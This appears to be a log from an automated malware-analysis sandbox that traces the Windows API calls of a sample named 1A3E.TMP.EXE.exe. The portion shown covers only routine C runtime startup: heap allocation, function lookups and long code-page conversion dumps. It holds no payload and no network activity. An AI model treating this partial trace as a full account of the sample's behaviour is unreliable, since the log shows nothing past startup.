# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 21.03.2020 04:46:35.563 Process: id = "1" image_name = "1a3e.tmp.exe.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1a3e.tmp.exe.exe" page_root = "0x41480000" os_pid = "0xb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x270 [0042.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xca340da0, dwHighDateTime=0x1d5ff3b)) [0042.807] GetCurrentProcessId () returned 0xb0 [0042.807] GetCurrentThreadId () returned 0x270 [0042.808] GetTickCount () returned 0x11461ef [0042.808] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=16277214148) returned 1 [0042.916] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x40768b)) [0042.916] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x6d0000 [0042.917] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.918] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0042.918] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0042.918] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0042.918] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0042.918] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.918] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0042.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.919] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0042.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.919] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0042.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.919] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0042.920] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.920] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0042.920] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.920] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0042.920] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.920] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0042.921] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.921] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0042.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x214) returned 0x6d07d0 [0042.922] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.922] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0042.922] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.922] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0042.922] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0042.922] GetCurrentThreadId () returned 0x270 [0042.922] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0042.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x800) returned 0x6d09f0 [0042.923] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0042.923] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0042.923] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0042.923] SetHandleCount (uNumber=0x20) returned 0x20 [0042.923] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe\" " [0042.923] GetEnvironmentStringsW () returned 0x701cc0* [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xaca) returned 0x6d11f8 [0042.924] FreeEnvironmentStringsW (penv=0x701cc0) returned 1 [0042.924] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4aadc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1a3e.tmp.exe.exe")) returned 0x36 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6d1cd0 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x98) returned 0x6d1d50 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x3e) returned 0x6d1df0 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x6c) returned 0x6d1e38 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x6e) returned 0x6d1eb0 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x78) returned 0x6d1f28 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x62) returned 0x6d1fa8 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2e) returned 0x6d2018 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x48) returned 0x6d2050 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x28) returned 0x6d20a0 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1a) returned 0x6d20d0 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x4a) returned 0x6d20f8 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x72) returned 0x6d2150 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x30) returned 0x6d21d0 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2e) returned 0x6d2208 [0042.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1c) returned 0x6d2240 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xd2) returned 0x6d2268 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x7c) returned 0x6d2348 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x36) returned 0x6d23d0 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x3a) returned 0x6d2410 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x90) returned 0x6d2458 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x24) returned 0x6d24f0 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x30) returned 0x6d2520 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x36) returned 0x6d2558 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x48) returned 0x6d2598 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x52) returned 0x6d25e8 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x3c) returned 0x6d2648 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x82) returned 0x6d2690 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2e) returned 0x6d2720 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1e) returned 0x6d2758 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2c) returned 0x6d2780 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x54) returned 0x6d27b8 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x52) returned 0x6d2818 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2a) returned 0x6d2878 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x3c) returned 0x6d28b0 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x54) returned 0x6d28f8 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x24) returned 0x6d2958 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x30) returned 0x6d2988 [0042.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x8c) returned 0x6d29c0 [0042.925] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6d11f8 | out: hHeap=0x6d0000) returned 1 [0042.926] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0042.926] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0042.926] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0042.927] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x800) returned 0x6d11f8 [0042.927] GetLastError () returned 0x0 [0042.927] SetLastError (dwErrCode=0x0) [0042.927] GetLastError () returned 0x0 [0042.928] SetLastError (dwErrCode=0x0) [0042.928] GetLastError () returned 0x0 [0042.928] SetLastError (dwErrCode=0x0) [0042.928] GetACP () returned 0x4e4 [0042.928] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x220) returned 0x6d1a00 [0042.928] GetLastError () returned 0x0 [0042.928] SetLastError (dwErrCode=0x0) [0042.928] IsValidCodePage (CodePage=0x4e4) returned 1 [0042.928] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0042.928] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0042.928] GetLastError () returned 0x0 [0042.928] SetLastError (dwErrCode=0x0) [0042.928] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0042.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0042.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0042.928] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0042.928] GetLastError () returned 0x0 [0042.929] SetLastError (dwErrCode=0x0) [0042.929] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0042.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0042.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ윜ਸ਼@Ā") returned 256 [0042.929] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ윜ਸ਼@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0042.929] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ윜ਸ਼@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0042.929] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1büß", lpUsedDefaultChar=0x0) returned 256 [0042.929] GetLastError () returned 0x0 [0042.929] SetLastError (dwErrCode=0x0) [0042.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0042.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ윜ਸ਼@Ā") returned 256 [0042.929] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ윜ਸ਼@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0042.929] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ윜ਸ਼@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0042.929] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1büß", lpUsedDefaultChar=0x0) returned 256 